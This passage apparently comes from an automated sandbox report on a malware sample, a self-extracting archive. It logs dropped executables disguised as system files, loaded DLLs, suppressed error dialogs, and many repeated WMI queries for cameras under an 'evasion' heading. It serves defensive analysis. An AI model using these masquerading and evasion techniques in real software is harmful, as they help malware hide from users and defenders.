                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: devobj.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: ksuser.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: avrt.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: audioses.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: powrprof.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: msacm32.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: midimap.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeDirectory created: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exeJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeDirectory created: C:\Program Files\Microsoft Office 15\6bc8f6e50ab287Jump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeDirectory created: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exeJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeDirectory created: C:\Program Files\Windows Multimedia Platform\24dbde2999530eJump to behavior
                                    Source: cuAvoExY41.exeStatic file information: File size 2278706 > 1048576
                                    Source: cuAvoExY41.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: cuAvoExY41.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: cuAvoExY41.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: cuAvoExY41.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: cuAvoExY41.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: cuAvoExY41.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: cuAvoExY41.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: cuAvoExY41.exe
                                    Source: cuAvoExY41.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: cuAvoExY41.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: cuAvoExY41.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: cuAvoExY41.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: cuAvoExY41.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeFile created: C:\surrogateFontdhcpCommon\__tmp_rar_sfx_access_check_5101671Jump to behavior
                                    Source: cuAvoExY41.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCF640 push ecx; ret 0_2_00FCF653
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCEB78 push eax; ret 0_2_00FCEB96
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeCode function: 4_2_00007FFD9B7E00AD pushad ; iretd 4_2_00007FFD9B7E00C1
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeCode function: 4_2_00007FFD9BBD5528 pushad ; retf 4_2_00007FFD9BBD5529
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeCode function: 9_2_00007FFD9BE176FC push E95F0CD1h; ret 9_2_00007FFD9BE17709
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeCode function: 9_2_00007FFD9BE15528 pushad ; retf 9_2_00007FFD9BE15529
                                    Source: ChainPortServerBrowsermonitor.exe.0.drStatic PE information: section name: .text entropy: 7.55370402414694
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe.4.drStatic PE information: section name: .text entropy: 7.55370402414694
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe0.4.drStatic PE information: section name: .text entropy: 7.55370402414694
                                    Source: WmiPrvSE.exe.4.drStatic PE information: section name: .text entropy: 7.55370402414694
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe1.4.drStatic PE information: section name: .text entropy: 7.55370402414694
                                    Source: upfc.exe.4.drStatic PE information: section name: .text entropy: 7.55370402414694
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Users\Public\Libraries\KSFasOVYpBufeMshBMPdEDfTcvlm.exeJump to dropped file
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeFile created: C:\Users\user\Desktop\UxpXqoOQ.logJump to dropped file
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeFile created: C:\Users\user\Desktop\CUGzHwzy.logJump to dropped file
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeFile created: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Users\user\Desktop\ddDNduPc.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Users\user\Desktop\ffpwzeUX.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\surrogateFontdhcpCommon\upfc.exeJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Users\user\Desktop\dVTvzLpX.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Users\user\Desktop\oOILjGZF.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Users\user\Desktop\EQOQCKPT.logJump to dropped file
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeFile created: C:\Users\user\Desktop\vnZStDyM.logJump to dropped file
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeFile created: C:\Users\user\Desktop\mKRcJKjf.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeJump to dropped file
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeFile created: C:\Users\user\Desktop\VDAxqXDQ.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exeJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exeJump to dropped file
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe Process information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
